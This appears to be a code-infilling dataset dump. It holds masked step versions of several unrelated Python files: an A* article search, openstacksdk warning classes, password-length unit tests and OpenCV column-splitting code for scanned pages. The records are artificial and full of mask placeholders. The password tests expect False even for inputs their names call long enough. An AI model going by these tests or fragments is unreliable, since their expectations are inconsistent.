nexts = cur.get_children(None)\n for next in nexts:\n if next not in visited:\n article = Article(next, target, cur, heuristic)\n queue.insert(article)\n visited.add(next)\n print(article.f, article.title)\n cur = queue.pop()\n print(\"CUR:\", cur.f, cur.title)\n\n path = [cur.title]\n\n while path[0] != source:\n cur = cur.parent\n path.insert(0, cur.title)\n\n return path\n\n# print(a_star(\"Dog\", \"Aardwolf\", heuristic_2))\n",
"step-ids": [
12,
15,
17,
18,
23
]
}
|
[
12,
15,
17,
18,
23
] |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class OpenStackDeprecationWarning(DeprecationWarning):
"""Base class for warnings about deprecated features in openstacksdk."""
class RemovedResourceWarning(OpenStackDeprecationWarning):
"""Indicates that a resource has been removed in newer API versions and
should not be used.
"""
class RemovedFieldWarning(OpenStackDeprecationWarning):
"""Indicates that a field has been removed in newer API versions and should
not be used.
"""
class LegacyAPIWarning(OpenStackDeprecationWarning):
"""Indicates an API that is in 'legacy' status, a long term deprecation."""
class OpenStackWarning(Warning):
"""Base class for general warnings in openstacksdk."""
class ConfigurationWarning(OpenStackWarning):
"""Indicates an issue with configuration."""
class UnsupportedServiceVersion(OpenStackWarning):
"""Indicates a major version that SDK doesn't understand."""
|
normal
|
{
"blob_id": "6339a1a06319a748030b3411c7a8d00f36336e65",
"index": 9778,
"step-1": "<mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n <mask token>\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-2": "<mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-3": "class OpenStackDeprecationWarning(DeprecationWarning):\n <mask token>\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-4": "class OpenStackDeprecationWarning(DeprecationWarning):\n \"\"\"Base class for warnings about deprecated features in openstacksdk.\"\"\"\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-5": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nclass OpenStackDeprecationWarning(DeprecationWarning):\n \"\"\"Base class for warnings about deprecated features in openstacksdk.\"\"\"\n\n\nclass RemovedResourceWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a resource has been removed in newer API versions and\n should not be used.\n \"\"\"\n\n\nclass RemovedFieldWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates that a field has been removed in newer API versions and should\n not be used.\n \"\"\"\n\n\nclass LegacyAPIWarning(OpenStackDeprecationWarning):\n \"\"\"Indicates an API that is in 'legacy' status, a long term deprecation.\"\"\"\n\n\nclass OpenStackWarning(Warning):\n \"\"\"Base class for general warnings in openstacksdk.\"\"\"\n\n\nclass ConfigurationWarning(OpenStackWarning):\n \"\"\"Indicates an issue with configuration.\"\"\"\n\n\nclass UnsupportedServiceVersion(OpenStackWarning):\n \"\"\"Indicates a major version that SDK doesn't understand.\"\"\"\n",
"step-ids": [
11,
12,
13,
14,
15
]
}
|
[
11,
12,
13,
14,
15
] |
import unittest
from validate_pw_complexity import *
class Test_PW_Functions(unittest.TestCase):
def test_pw_not_long_enough_min(self):
sample_pass ="abcd"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_just_long_enough_min(self):
sample_pass = "abcdadca"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_long_enough_min(self):
sample_pass = "abcdadcaabc"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
|
normal
|
{
"blob_id": "dc7d75bf43f1ba55673a43f863dd08e99a1c0e0f",
"index": 4820,
"step-1": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-2": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n <mask token>\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-3": "<mask token>\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = 'abcdadca'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-4": "import unittest\nfrom validate_pw_complexity import *\n\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass = 'abcd'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = 'abcdadca'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = 'abcdadcaabc'\n expected_result = False\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-5": "import unittest\n\nfrom validate_pw_complexity import *\n\nclass Test_PW_Functions(unittest.TestCase):\n\n def test_pw_not_long_enough_min(self):\n sample_pass =\"abcd\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_just_long_enough_min(self):\n sample_pass = \"abcdadca\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n\n def test_pw_long_enough_min(self):\n sample_pass = \"abcdadcaabc\"\n expected_result = False\n\n result = validate_pw_long(sample_pass)\n self.assertEqual(expected_result, result)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
<|reserved_special_token_0|>
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
<|reserved_special_token_0|>
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = a.size - 2 + 1
return a[1 * np.arange(nrows)[:, None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['OPENCV_IO_ENABLE_JASPER'] = 'True'
<|reserved_special_token_0|>
DILATE_KERNEL = np.array([[0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,
0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0,
0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,
0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype
=np.uint8)
def adaptative_thresholding(img, threshold):
I = img
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
orignrows, origncols = gray.shape
M = int(np.floor(orignrows / 16) + 1)
N = int(np.floor(origncols / 16) + 1)
Mextend = round(M / 2) - 1
Nextend = round(N / 2) - 1
aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=
Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M, N), np.int32)
imageIntegral = cv2.integral(aux, windows, -1)
nrows, ncols = imageIntegral.shape
result = np.zeros((orignrows, origncols))
for i in range(nrows - M):
for j in range(ncols - N):
result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N
] + imageIntegral[i, j] - imageIntegral[i + M, j]
binar = np.ones((orignrows, origncols), dtype=np.bool)
graymult = gray.astype('float64') * M * N
binar[graymult <= result * (100.0 - threshold) / 100.0] = False
binar = (255 * binar).astype(np.uint8)
return binar
def Q_test(sorted_data):
conf95_level = {(3): 0.97, (4): 0.829, (5): 0.71, (6): 0.625, (7):
0.568, (8): 0.526, (9): 0.493}
q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] -
sorted_data[0])
print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(
sorted_data[-1] - sorted_data[0])))
print('q_exp : ' + str(q_exp))
return q_exp > conf95_level[min(9, len(sorted_data))]
COLUMNS = 0
GREEN = 0, 255, 0
LINE_THICKNESS = 3
PADDING = 10
CREATE_COLUMN_OUTLINE_IMAGES = True
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = a.size - 2 + 1
return a[1 * np.arange(nrows)[:, None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print('invert image')
_, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print('applying dilation morph')
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)
"""
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
"""
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis=COLUMNS)
sums[0] = 1000
sums = sums * -4
peaks, _ = find_peaks(sums, distance=600)
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
"""
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
"""
print('PeakNum, Sum, QRemove for ' + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print('----------')
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print(
'ERROR: something went wrong with finding the peaks for image: '
, os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + '.jpg 0\n')
return files
peaks[0] = 0
peaks[-1] = sums.size - 1
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print('found image that is causing problems: ', os.path.join(
directory, basename))
f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks
.size) + '\n')
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0] - PADDING, 0)
xend = min(columnIndexPair[1] + PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (
basename, xstart, xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print('writing out cropped image: ', filepath)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,
LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
return files
def invert_experiment():
test_img = cv2.imread(
'./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_, temp_img = cv2.threshold(test_img, thresh, 255, cv2.
THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',
temp_img)
def test(img, basename):
test_img = convertToGrayscale(img)
test_img = invert(test_img)
test_img = dilateDirection(test_img)
